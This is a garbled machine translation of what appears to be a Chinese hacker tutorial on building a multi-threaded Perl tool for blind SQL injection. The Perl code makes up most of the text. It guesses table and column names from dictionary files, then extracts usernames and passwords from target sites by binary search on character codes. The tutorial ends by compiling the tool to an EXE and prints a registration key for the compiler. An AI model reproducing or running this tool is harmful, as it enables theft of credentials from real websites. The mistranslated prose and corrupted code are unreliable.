The PERL foundry Multi-threading+support Chinese crack SQL automatically injected into the guessing machine-vulnerability warning-the black bar safety net

Say toSQL injectionmachine, from the doll for moving the web article dvTxt. pl to the smelly bum peerless guess CSC, NB Alliance, NBSI, we have used?
开 天 始祖 dvTxt.pl also don’t be changed how many times, to be used for a variety of differentSQL injectionthe vulnerability of the system, usually the Black Defense of thepresenceSQL injectionthe vulnerability of the articles, finally, to put this statue of Buddha was being carried out, changes a few fields, and then, again, akilling tools unearthed! For the smelly beggar peerless guess CSC, I used to have is already enough, although the use of Multi-threading technology, but still make up no algorithm shitty adverse effects, the crack due to the use of the dictionary, not only slow, but also limits the Chinese, such double-byte characters to crack, and NBSI, to crack the algorithm, although improved, but forget about Multi-threading, but also in the guess table names, column names, share a large dictionary, in vain wasted a lot of time. Two things fight together just fine, but without the original code The Visual development tools, the next it will only use VB for? Also don’t know the bosses are not in a language developed, even if it is the same, even if it is VB, there is no people who are willing to provide the original code, helpless…had to response the President called for: do it yourself, clothed it!
The program however is the manual becomes automatic, the first to painfully recall manually injected into the guess of the process: 1. Find injection points->2. Construct the SQL query statement->3. Submit URL->4. Depending on the browser to return information to determine the SQL query statement correctness->5. Fixed SQL query->6. Repeat 3. 4. Step 5 N times, until you get the database stored the correct information.
Translated into program language: 1. The input existsSQL injectionvulnerabilities URL$url->2. Extracted from the URL host($host), a path to the$path and port$port->3. Construct the SQL query added to the URL$url->4. Use I:Socket to the target host submit URL ->5. From the returned page to extract the query logic is true fake the presence of the character（$info）, successfully then transferred to the next target value of the guess, fail, then continue to repeat 3. 4. Step 5.
Guess the solution of a global flow chart is as follows:
User information table - > User Name field - > Password field - > ID field - > minimum user ID - > user name length- > password length - > user name > password
That was a bit minimalistic, because these things popularity was really good, more detailed content, you can refer to the hacking of Defense under Section 5 of theSQL injectiontopic, The theory finished, we all can’t help, the edgy, the saber-rattling…
LET’GO!!!
A． Extract$URL host$host, and the path to the$path and port$port
还 曾 记得 娃娃 的 那个 dvTxt.pl, and its cumbersome usage: dvTxt.pl <host> <way> <articleID> <errInfo>, $URL a family of three is living apart, in heaven!
In use, the copy and paste up is extremely inconvenient, in fact, the use of PERL’s powerful regular expressions, but can be solved, the first to casually observe a few URL: _blank>http://www.hemon.tk/show.asp?id=957 and _blank>http://www.hemon.tk:1314/show.asp?id=957 and _blank>http://www.hemon.tk/article/show.asp?id=957 the. Through the phenomenon see the essence, the law also came out:（_blank>http://in the host to: port/ path. （）Within the character appears 0 OR 1 times.
Regular expressions also have:

Program code: if($url=~/(//)? (.+?)/ (.+)/)
{
$host=$2;
$path=‘/’.$ 3;
if($host=~/(.+): (.+)/)
{
$host=$1;
$port=$2;
}
}

In“$url=~/(//)? (.+?)/ (.+)/” First to say say that? that? Match 0 OR 1 of the character, so the input link of times“_blank>http://”is optional; matching host$host is (.+?), the Why not (.+), the Because perl the default greedy mode, as much as possible matching to the back of the character here is‘/’, so if it is not limited to such a URL: _blank>http://www.hemon.tk/article/show.asp?id=957 that$host will match to www. hemon. tk/article, and not what we want www.hemon.tk the.
II. I:Socket submit function
Through earlier efforts, it’s payback time, and quickly with our extraction get the host$host and path to the$path and Port$port to write the Submit function:

Code: sub connect
{
$req = “GET $path$path1 HTTP/1.0\n”.
“Host: $host\n”.
“Referer: $host\n”.
“Cookie: \n\n”;

my $connection = I:Socket::INET->new(Proto =>“tcp”,
PeerAddr =>$host,
PeerPort =>$port) || die “Sorry! Could not connect to $host \n”;
print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}

The Connect sub-routine will return the information stored in the array@res;
III. Guess the user information table
Using the SQL query statement: 0<>(select count(*) from TABLE)
The real crack starts,there is no shortcut to go, sequentially read the dictionary to store the table name,and then one by one try, upon a successful match the correct information, immediately exit the while loop; the dictionary, there are two, one is the array, second is the text of the dictionary, the PERL scripts we will be compiled into the EXE executable file, in order to facilitate future modifications to add the new table name, I use a text dictionary file:

Program code: open (tabInput,“table.txt”) or die “can’t open file!\ n”;
while (chomp(my $input=<tabInput>))
{
my $sql=“0<>(select%20count(*)%20from%2 0$input)”;
$path1 = “%20AND%2 0$sql”;
&url;
@res = &connect;
if (“@res”=~/$info/)
{
$table_user=$input;
print “the table of userinfo is:$table\n”;
last;
}
}
close(tabInput);

IV. Guess the field name
The use of SQL query statements: exists (select COL_NAME from TABLE)
This step is the same guess table names exactly the same, once successfully get the table name, we will split three-way, direct access to the user list（$field_user, and password columns$field_pass, the ID column,$field_id, and since it is sub soldiers sortie, you have to use multi thread in PERL Multi-threading, Oh, you haven’t tried?
For the realization of multi-thread as the first to prepare, prepare to guess the solution of the sub-routine function,we still use a text dictionary file, where the file name as the only argument: the

Program code: sub field_input
{
my $field;
open (fieInput,“$_[0]”) or die “can’t open file!\ n”;
while (chomp(my $input=<fieInput>))
{
my $sql=“exists%2 0(select%2 0$input%20from%2 0$table_User)”;
$path1 = “%20AND%2 0$sql”;
my @res = &connect;
if (“@res”=~/$info/)
{
$field=$input;
print “\t±- $field --+”;
last;
}
}
close(fieInput);
return $field;
}

V. PERL multi-thread crash
And then, and then, of course, is learning PERL Multi-threading technology to it!!! Perhaps now you begin to tremble with fear, thinking it what a great, Oh, 8 0/2 0 Swiss army knife laws here yet so useful, we only need to learn two functions can be the end of our crash course: the
$thread = threads->create(function, LIST)
In the name of the variable$thread, create a sub-routine\function FUNCTION of a thread LIST for the sub-routine\function of the parameter, the CREATE can be replaced with NEW.
$thread->join
Wait for the thread to run to completion. Once the end of the Run, and join()will return a sub-routine\function FUNCTION value.
THAT’S ALL YOU!
It’s that simple? ? So the two chopper can dry our revolution!!!
For details, see ActicePerl the help document: Perl/html/lib/threads.html.
5、4、3、2、1、ignition now!

Program code: $thread1 = threads->create(“field_Input”,“field_Username.txt”);
$thread2 = threads->create(“field_Input”,“field_Password.txt”);
$thread3 = threads->create(“field_Input”,“field_ID.txt”);

Recovery return position:

Program code: $field_Username = $thread1->join();
$field_Password = $thread2->join();
$field_ID = $thread3->join();

At the same time emitted from the three threads, and then JOIN back, what a perfect landing, Ah, 1 0 points for it!!!
V. Number guessing tricks
Even more than a few horses, the horses then more also did not run but the wheels of the car, let’s examine guessing tips, step back and look at the wait for our task: the minimum user ID - > user name length- > password length - > user name > password.
The ID value is the natural value, the length is length($field)is a number, a user name and password is ASCII code or value, have played online a guess the number JAVASCRIPT game? A 1 0 0 less than the number, why only give you 7 chances to guess? Because 2^7=1 2 8, in other words, a 1 2 8 less than a number, you only need to guess 7 times, then Lee wing program inside those thousands of tens of thousands of dollars of things, but also to guess a few times?？ 2^1 3=8 1 9 2, 2^1 4=1 6 3 8 4，you also worry not get the prize?!
In order to let everyone see a little, guess a 8 or less, such as 5, the steps are as follows:
? < 4 N
? < 6 Y 4 + 2
? < 5 N 6 - 1
? = 5
Also it took three times, first from the value of the（4）The start, each guess a plus\minus the median of the half of 2, 1, 2^n are fixed, in order to avoid the CPU repeats the calculation, according to the guess range of values, corresponding to the preparation of an array, I have prepared four:

Program code: @dic1=(128,64,32,16,8,4,2,1); # the minimum user ID
@dic2=(16,8,4,2,1); # the username, password length
@dic3=(64,32,16,8,4,2,1); # English characters
@dic4=(16384,8192,4096,2048,1024,512,256,128,64,32,16,8,4,2,1); #Chinese character

The algorithm functions as follows:
sub crack
{
my(@dic) = @_;
my $sql=pop(@dic);
my $i=0;
my $op=1;
my $crack;
foreach my $pass(@dic)
{
print “>”;
$i++;
$crack+=$op*$pass;
$path1 = “%20AND%2 0$crack<($sql)”;
my @res = &connect;
if (“@res” =~ /$info/)
{
$op=1;
if($i==@dic)
{
$crack++;
}
}
else
{
$op=-1;
}
}
return $crack;
}

$sql=“select%20min($field_ID)%20from%2 0$table_User”;
$id=&crack(@dic1,“$sql”);

Passed into the configuration of theSQL injectionstatement and the corresponding array of dictionary, CRACK it!!!
Parameter is an array, the subroutine simply assigns it to an array variable my(@dic)and non-my(@dic,$sql) =@_;the latter,$sql necessarily is empty! Simple variables and array variables can be simultaneously transmitted, the$sql is here@dic of the last element. pop(@dic)and then deleting the list of last elements of the$sql, and as a return value,the rest of the@dic is pure digital.
Let’s Bang, taking down the user name and password length of at the same time, don’t forget to use Multi-threading:

Program code: $sql=“select%20len($field_Username)%20from%2 0$table_User%20where%20field_ID=$id”;
my $thread4 = threads->create(“crack”,@dic2,$sql);
$sql=“select%20len($field_Password)%20from%2 0$table_User%20where%2 0$field_ID=$id”;
my $thread5 = threads->create(“crack”,@dic2,$sql);
$userlen = $thread4->join();
$passlen = $thread5->join();

VI. The last battle-break field value
Using the SQL query statement: select abs(asc(mid($fieUsername,$locat,1))) from $table_User where $field_Id = $id
Here not to discuss MS-SQL guess, you can say MS-SQL the following is needless to guess, as long as you structure the conditions good enough, you can directly let the other party in error when the data content is directly displayed.
ACCESS the characters in a guess: we must first determine the ASCII code value is greater than zero, greater than,@dic3 set to CRACK the function inside of, less than with@dic4! The function returns the value later, for the English characters, there are two methods: using the nchar($asc)or pack(‘C*’,$asc);and for Chinese characters: open the calculator, select scientific, is converted into a hexadecimal word, is**with UltraEdit for editingword, haha… That’s not called programming!
The first to use sprintf(“%X”,$asc)to complete the calculator to convert the hex to work, and don’t forget to use the regular expressions proposed by the last four bits, or one word in front would take out the two spaces, and then use pack("H",$str)complete UltraEdit packing job:

Program code: sub asc
{
my $asc=$_[0];
my $str;
if ($asc<2 5 6)
{
$str = pack(‘C*’,$asc);
}
else
{
$asc*=-1;
$str = sprintf(“%X”,$asc);
if ($str=~/(. {4})$/i)
{
$str=$1;
}
$str = pack(“H*”,$str);
}
return $str;
}

Everything is ready, only owe the East wind,this name just guess the decryption code value, for example, a password to start a CRACK sub-thread:

Program code: for (my $locat=1;$locat<=$passlen;$locat++)
{
$sql = “select%20asc(mid($field_Password,$locat,1))%20from%2 0$table_User%20where%2 0$field_Id=$id”;
$path1 = “%20AND%2 0 0>($sql)”;
my @res = &connect;
if (“@res” =~ /$info/)
{
$sql = “select%20abs(asc(mid($field_Password,$locat,1)))%20from%2 0$table_User%20where%2 0$field_Id=$id”;
$password[$locat] = threads->create(“crack”,@dic4,$sql);
}
else
{
$password[$locat] = threads->create(“crack”,@dic3,$sql);
}
}

Slowly waiting for these kids to have a personal Homecoming it:

Program code: for (my $locat=1;$locat<=$passlen;$locat++)
{
$password[$locat] = $password[$locat]->join();
}

Other display details, I do not mean to say, hastens to the compiled EXE. GO!
VI. Compile perl to EXE
From perl2exe old _blank>http://www.indigostar.com/perl2exe.htm , DOWN a latest version of Perl2Exe for Win32, so far is 8. 4 0, the direct decompression, CMD command line, enter the unzipped directory, in order to avoid browsing annoying ads, we first have to register about this software:

Program code: D:\hemon\software>perl2exe-register
Perl2Exe V8. 4 0 Copyright © 1997-2004 IndigoSTAR Software
Please enter your registration key, or press enter to cancel

Input my registration code:
hemon:hemon:20040709,36713
After successful registration shows:
Registered
At the same time, the program directory to generate a named perl2exe. key registry file, you can do moves not Ah!
Compile the PL:

Program code: D:\hemon\software>perl2exe si.pl
Perl2Exe V8. 4 0 Copyright © 1997-2004 IndigoSTAR Software
Registered to hemon:hemon:2 0 0 4 0 7 0 9, The ENT version
Converting ‘si.pl’ to si.exe

A multi-threaded, support Chinese crack PERL version of the injector was born!!!
About can improve a times the speed, that is, you can save half the time, and I expected to still have great access. The catch is that it really should be“haste makes waste”to the old saying, I have provided two versions thr.pl\sig.pl for those with slower connections website, huh?.. With, you know, the average person I don’t tell! Best to just use a single thread, good stability.
However, code in hand, I’m afraid you’ll change, enhance the stability of what, slightly plus a few functions to make it support PHP+MYSQL, ASP+MSSQL or something…
Phrase: network of poly people power! Support the opening of the original code!